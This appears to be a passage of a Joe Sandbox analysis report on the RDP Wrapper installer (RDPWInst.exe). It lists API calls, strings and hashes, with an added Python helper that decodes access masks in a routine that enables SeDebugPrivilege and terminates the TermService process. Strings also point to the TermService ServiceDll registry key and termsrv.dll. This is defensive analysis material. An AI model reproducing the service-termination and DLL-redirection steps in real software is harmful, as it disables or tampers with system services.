                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$CloseHandleOpenProcess$ManagerServiceSleep$CurrentEnumEnvironmentExpandServicesStatusStringsTerminateToken
                                                    • String ID: $sD$%d.%.2d.%.2d$SeDebugPrivilege$TermService$[*] Current update date: $[*] Everything is up to date.$[*] Latest update date: $[*] Terminating service...$[*] Your INI file is newer than public file. Are you a developer? :)$[+] New update is available, updating...$[+] Update completed.$[-] Failed to download latest INI from GitHub.$rdpwrap.ini
                                                    • API String ID: 3534747103-2332903941
                                                    • Opcode ID: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                    • Instruction ID: 35adde3c6c2359a68fd4b220f91aa0339034fd12c6c7055d874297ef65b27e77
                                                    • Opcode Fuzzy Hash: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                    • Instruction Fuzzy Hash: D5813074E042099BDB04FBA9D48169DB7B1EF8D308F51507AF504F7392DB38AD058B6A
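The record above is the RDPWInst INI-update routine: it enumerates services through the SCM (OpenSCManagerW with access 0x5, EnumServicesStatusExW with type 0x30 / state 0x3), opens its own token with 0x28 (the strings list SeDebugPrivilege), opens a process with access 0x1 and calls TerminateProcess on it, then sleeps 1000 ms and 500 ms; the strings "[*] Terminating service..." and "TermService" name the intended victim. Below is an added analyst helper, written for this edit and not code from Joe Sandbox or from the RDP Wrapper project, that parses API lines in exactly this listing format, decodes the access masks against the Win32 SDK bit values, and reports the behaviour chain. The sample input is the record's own lines; reading the leading tokens of each call as its parameters and the trailing tokens as other recorded stack content is my interpretation of how the listing is laid out, and the behaviour labels are mine.

```python
"""Parse Joe Sandbox per-function API listings and decode the call chain.

Added analyst tooling for this report; not Joe Sandbox or RDP Wrapper code.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Sample input: the API lines of the RDPWInst service-termination routine,
# copied from the record above (bullets and "Part of subcall" prefixes kept).
SAMPLE_TRACE = """\
• Part of subcall function 0043B7D4: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
• Part of subcall function 0043B7D4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
• Part of subcall function 0043BF00: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
• Part of subcall function 0043C1C8: OpenProcess.KERNEL32(00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
• Part of subcall function 0043C1C8: TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
• Sleep.KERNEL32(000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043F9CC
• Sleep.KERNEL32(000001F4,000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043FA09
• Part of subcall function 0043B58C: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
"""

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-F]{8}$")

# Access-mask bit names (Win32 SDK values) for the calls in this routine.
SCM_ACCESS = {0x1: "SC_MANAGER_CONNECT", 0x2: "SC_MANAGER_CREATE_SERVICE",
              0x4: "SC_MANAGER_ENUMERATE_SERVICE", 0x8: "SC_MANAGER_LOCK"}
SERVICE_TYPE = {0x1: "SERVICE_KERNEL_DRIVER", 0x2: "SERVICE_FILE_SYSTEM_DRIVER",
                0x10: "SERVICE_WIN32_OWN_PROCESS", 0x20: "SERVICE_WIN32_SHARE_PROCESS"}
SERVICE_STATE = {0x1: "SERVICE_ACTIVE", 0x2: "SERVICE_INACTIVE"}
TOKEN_ACCESS = {0x1: "TOKEN_ASSIGN_PRIMARY", 0x2: "TOKEN_DUPLICATE", 0x4: "TOKEN_IMPERSONATE",
                0x8: "TOKEN_QUERY", 0x10: "TOKEN_QUERY_SOURCE", 0x20: "TOKEN_ADJUST_PRIVILEGES",
                0x40: "TOKEN_ADJUST_GROUPS", 0x80: "TOKEN_ADJUST_DEFAULT"}
PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
                  0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x40: "PROCESS_DUP_HANDLE",
                  0x400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}


@dataclass
class ApiCall:
    api: str
    dll: str
    args: list              # raw tokens: 8-hex-digit values, '?' (unknown) or strings
    ref: int                # address of the call instruction
    subcall: Optional[int]  # function the call was hoisted from, if any

    def hex(self, i):
        """Argument i as an int, or None when it is '?' or a string literal."""
        if i < len(self.args) and HEX8.match(self.args[i]):
            return int(self.args[i], 16)
        return None


def parse_api_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    return ApiCall(api=m["api"], dll=m["dll"], args=m["args"].split(","),
                   ref=int(m["ref"], 16),
                   subcall=int(m["sub"], 16) if m["sub"] else None)


def parse_trace(text):
    return [c for c in map(parse_api_line, text.splitlines()) if c]


def decode_mask(mask, table):
    """Names of the set bits, low bit first; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if mask & bit]
    rest = mask & ~sum(table)
    return names + ([f"0x{rest:X}"] if rest else [])


def summarize(calls):
    """Map the sequence to behaviours. The listing shows the stack at the call
    site, so the leading tokens are the parameters and later ones are other
    recorded stack content; indices below follow the documented prototypes."""
    s = {"scm_access": [], "service_filter": None, "token_access": [],
         "process_access": [], "target_pid": None, "sleeps_ms": [], "kill_chain": False}
    for c in calls:
        if c.api == "OpenSCManagerW" and c.hex(2) is not None:        # (machine, db, access)
            s["scm_access"].append(decode_mask(c.hex(2), SCM_ACCESS))
        elif c.api == "EnumServicesStatusExW" and None not in (c.hex(2), c.hex(3)):
            s["service_filter"] = {"type": decode_mask(c.hex(2), SERVICE_TYPE),   # (scm, level,
                                   "state": decode_mask(c.hex(3), SERVICE_STATE)}  #  type, state)
        elif c.api == "OpenProcessToken" and c.hex(1) is not None:     # (process, access, out)
            s["token_access"] = decode_mask(c.hex(1), TOKEN_ACCESS)
        elif c.api == "OpenProcess" and c.hex(0) is not None:          # (access, inherit, pid)
            s["process_access"] = decode_mask(c.hex(0), PROCESS_ACCESS)
            s["target_pid"] = c.hex(2)
        elif c.api == "Sleep" and c.hex(0) is not None:                # (milliseconds)
            s["sleeps_ms"].append(c.hex(0))
    apis = {c.api for c in calls}
    s["kill_chain"] = ({"OpenProcess", "TerminateProcess"} <= apis
                       and "PROCESS_TERMINATE" in s["process_access"])
    return s


if __name__ == "__main__":
    for key, value in summarize(parse_trace(SAMPLE_TRACE)).items():
        print(f"{key}: {value}")
```

Run against the sample, the summary shows SC_MANAGER_CONNECT|SC_MANAGER_ENUMERATE_SERVICE, a SERVICE_WIN32 / SERVICE_STATE_ALL enumeration, TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES on the installer's own token (the step that enables SeDebugPrivilege before touching a service process), a PROCESS_TERMINATE open on PID 0x1B9C (whatever PID the sandbox run assigned to the target; the strings say TermService), and the 1000 ms / 500 ms waits. The same parser works on any other "APIs" record in the report; only the behaviour rules are specific to this routine.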
                                                    APIs
                                                      • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                    • DeleteFileW.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D985
                                                    • GetLastError.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D98E
                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA04
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA0D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteErrorFileLast$EnvironmentExpandStrings
                                                    • String ID: $sD$[+] Removed file: $[+] Removed folder: $[-] DeleteFile error (code $[-] RemoveDirectory error (code $rdpwrap.ini
                                                    • API String ID: 1427661212-4281953003
                                                    • Opcode ID: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                    • Instruction ID: ad05ad182a3b94ca814d20fd028ad2e32e4b81082960bb03fd6afff070a44f54
                                                    • Opcode Fuzzy Hash: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                    • Instruction Fuzzy Hash: 31414F74A042049BDB00F7B6D94286EB375AF8D308F52813BF500B7697DA3CBD059A6E
                                                    APIs
                                                      • Part of subcall function 0041325C: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                      • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                      • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                      • Part of subcall function 0041325C: LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,00413571), ref: 004134AD
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134E0
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F2
                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F8
                                                    • GetStdHandle.KERNEL32(000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041350C
                                                    • WriteFile.KERNEL32(00000000,000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 00413512
                                                    • LoadStringW.USER32(00000000,0000FFE6,?,00000040), ref: 00413536
                                                    • MessageBoxW.USER32(00000000,?,?,00002010), ref: 00413550
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                    • String ID: $sD$(4A$LpD
                                                    • API String ID: 135118572-2961882766
                                                    • Opcode ID: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                    • Instruction ID: ef224b53181cf2408eecbf6e4a49f74db113686e973540ee16aa2e1e81a8a81f
                                                    • Opcode Fuzzy Hash: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                    • Instruction Fuzzy Hash: E4315E71640204BEE710EBA5DC82FDA73BDEB05B05F50417AB604F61D1DE78AE808B69
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 00409F3F
                                                    • GetLastError.KERNEL32(?), ref: 00409F4A
                                                    • RaiseException.KERNEL32(C0FB007E,00000000,00000001,?), ref: 00409F80
                                                    • EnterCriticalSection.KERNEL32(00449C1C), ref: 00409F92
                                                    • FreeLibrary.KERNEL32(?,00449C1C), ref: 00409FAA
                                                    • LeaveCriticalSection.KERNEL32(00449C1C,?,00449C1C), ref: 00409FB7
                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040A026
                                                    • GetLastError.KERNEL32 ref: 0040A031
                                                    • RaiseException.KERNEL32(C0FB007F,00000000,00000001,?), ref: 0040A067
                                                      • Part of subcall function 00409D9C: LocalAlloc.KERNEL32(00000040,00000008), ref: 00409DA8
                                                      • Part of subcall function 00409D9C: RaiseException.KERNEL32(C0FB0008,00000000,00000001,?,00000040,00000008), ref: 00409DBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionRaise$CriticalErrorLastLibrarySection$AddressAllocEnterFreeLeaveLoadLocalProc
                                                    • String ID: $
                                                    • API String ID: 4255670546-3993045852
                                                    • Opcode ID: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                    • Instruction ID: e7bef61209e92d946731ec4a4071e7a79c0b4aa0f4738c46576ebf8cfa3b661b
                                                    • Opcode Fuzzy Hash: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                    • Instruction Fuzzy Hash: EE618D7590070AAFDB21DFA5D885BAFB3B4AF48314F14803AE504B62D2D7789D44CB59
                                                    APIs
                                                    • MessageBoxA.USER32(00000000,?,004026E0,00002010), ref: 00403F39
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: $$zD$$zD$7$D&@$l&@$zPD$&@
                                                    • API String ID: 2030045667-2939321579
                                                    • Opcode ID: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                    • Instruction ID: 997706f527e00cc568bc624ae0a330c29571725258f71f9dd8560831bc4d878f
                                                    • Opcode Fuzzy Hash: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                    • Instruction Fuzzy Hash: E5B1B434A042548FDB20DF2DC884B997BE8AB09745F1441FAE449F7382CB799E85CB59
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(00000000,00415476,?,?,00000000,00000000), ref: 004151CE
                                                      • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                    Strings
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                    • API String ID: 4232894706-2493093252
                                                    • Opcode ID: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                    • Instruction ID: d9a4c13083f090c9220c38b115c8470d0dd0b24888f81dbd48f38483d2476b95
                                                    • Opcode Fuzzy Hash: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                    • Instruction Fuzzy Hash: C6717E34B005489BDB04EBA5C881BDF73A6DB88308F50843BB201EB39ADA3DDD95975C
                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004198D5
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004198F1
                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041992A
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004199A7
                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004199C0
                                                    • VariantCopy.OLEAUT32(?), ref: 004199F5
                                                    Strings
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                    • String ID:
                                                    • API String ID: 351091851-3916222277
                                                    • Opcode ID: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                    • Instruction ID: 05f3e7187411a66581312748be8f4c599b64c7f757b61d9c7bcf5be2e84cfcbc
                                                    • Opcode Fuzzy Hash: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                    • Instruction Fuzzy Hash: BB510E75A1061D9BCB62DB59CC91AD9B3BCAF0C314F0041DAE509D7311DA389FC18F69
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                    • GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                    • WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00406208
                                                    Strings
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$Message
                                                    • String ID: Error$Runtime error at 00000000
                                                    • API String ID: 1570097196-2970929446
                                                    • Opcode ID: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                    • Instruction ID: 3d9f27a079d1a1e85d20769b70378e11af8d5357eb747b9bac5a8d01f7cd0a80
                                                    • Opcode Fuzzy Hash: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                    • Instruction Fuzzy Hash: F8F09064688700B9FA1077A09D8BF5A264C5741F18F648A7FBA107C0E3C7FC44C5D66E
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                    • Instruction ID: cdb4153b94d32a19bbaa749183bbd41ea1cad44ce1b02117721c392bcbf59f8f
                                                    • Opcode Fuzzy Hash: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                    • Instruction Fuzzy Hash: AAC149627046001BE715AE7D9EC936E77899BC5326F18827FE504EB3C5DABCCE468348
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 00408D8D
                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 00408DA4
                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00408DD4
                                                    • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 00408E43
                                                    Strings
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$AddressHandleModuleProc
                                                    • String ID: GetLongPathNameW$kernel32.dll
                                                    • API String ID: 682285877-568771998
                                                    • Opcode ID: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                    • Instruction ID: bfed53c75bae09f5f3cffe8e2e1a10a808aab42f40121fe7fe66bb66f29727bd
                                                    • Opcode Fuzzy Hash: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                    • Instruction Fuzzy Hash: 65213E71D10219EBDB10DBE8CA85A9EB3F9AF04344F14457BA584F72C1EB789E408B99
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00447324,?,?,00443D51,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043CA09
                                                    Strings
                                                    • %SystemRoot%\System32\termsrv.dll, xrefs: 0043CA53
                                                    • $sD, xrefs: 0043CA16
                                                    • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C9F8
                                                    • [-] OpenKey error (code , xrefs: 0043CA1B
                                                    • ServiceDll, xrefs: 0043CA58
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: $sD$%SystemRoot%\System32\termsrv.dll$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters
                                                    • API String ID: 1452528299-1418523706
                                                    • Opcode ID: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                    • Instruction ID: 567d776bcdb317a1c07dce30fb64d79162ce412928a02d635409720c7dced6b6
                                                    • Opcode Fuzzy Hash: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                    • Instruction Fuzzy Hash: 5E1160746042049FD700FBAAED8355AB7A5DB89318F21A07FF504AB652CA396D01972D
                                                    APIs
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                    Strings
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleService
                                                    • String ID: error (code $$sD$[-]
                                                    • API String ID: 1725840886-1845222458
                                                    • Opcode ID: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                    • Instruction ID: e4f6fbb8d87d745fddbbf3aa76ef7c2d42e102f771b0e90c1d198fe2bf5ce7b8
                                                    • Opcode Fuzzy Hash: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                    • Instruction Fuzzy Hash: 411165B4604204AFD700FBA5C946A5EBBE9EF8C309F51807AF504DB652C738AE409A6D
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                    • Instruction ID: 2dafaf7b7fd63d2285bbc883fb865dc5d4a09b7d21a303d5748d7aa51e2b097e
                                                    • Opcode Fuzzy Hash: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                    • Instruction Fuzzy Hash: 33D18035E042599BCF10DBA9C4818FEB7B9EF49704B5080B7EC51A7251D738AD8BCB29
                                                    APIs
                                                    • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E12C
                                                    • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1D4
                                                    • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1F9
                                                    • CharNextW.USER32(00000000,?,?,00000000,0042E26E), ref: 0042E211
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharNext
                                                    • String ID:
                                                    • API String ID: 3213498283-0
                                                    • Opcode ID: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                    • Instruction ID: 1814d07402b1a7f57a8d7a3fe8506fdc05c33e5c0032e5bf9772b1ea290cc636
                                                    • Opcode Fuzzy Hash: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                    • Instruction Fuzzy Hash: D5516D30B00624DFDF15EF6AD890A697BB5EF06304F8100E6E401DB3A5D778AD92CB5A
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,00412F73,?,?,00000000), ref: 00412EF4
                                                      • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F24
                                                    • EnumCalendarInfoW.KERNEL32(Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F2F
                                                    • GetThreadLocale.KERNEL32(00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F4D
                                                    • EnumCalendarInfoW.KERNEL32(Function_00012E64,00000000,00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F58
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                    • String ID:
                                                    • API String ID: 4102113445-0
                                                    • Opcode ID: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                    • Instruction ID: 92d88662b64aaf91616c62fb6041fad244e46e3b41fee23c13374d6d2d88cd2b
                                                    • Opcode Fuzzy Hash: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                    • Instruction Fuzzy Hash: 930142713007046BE301A6B1CE13F9A726CEB82718F610437F100F66C1D6BCAE2192AD
                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,004131C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412FCB
                                                      • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
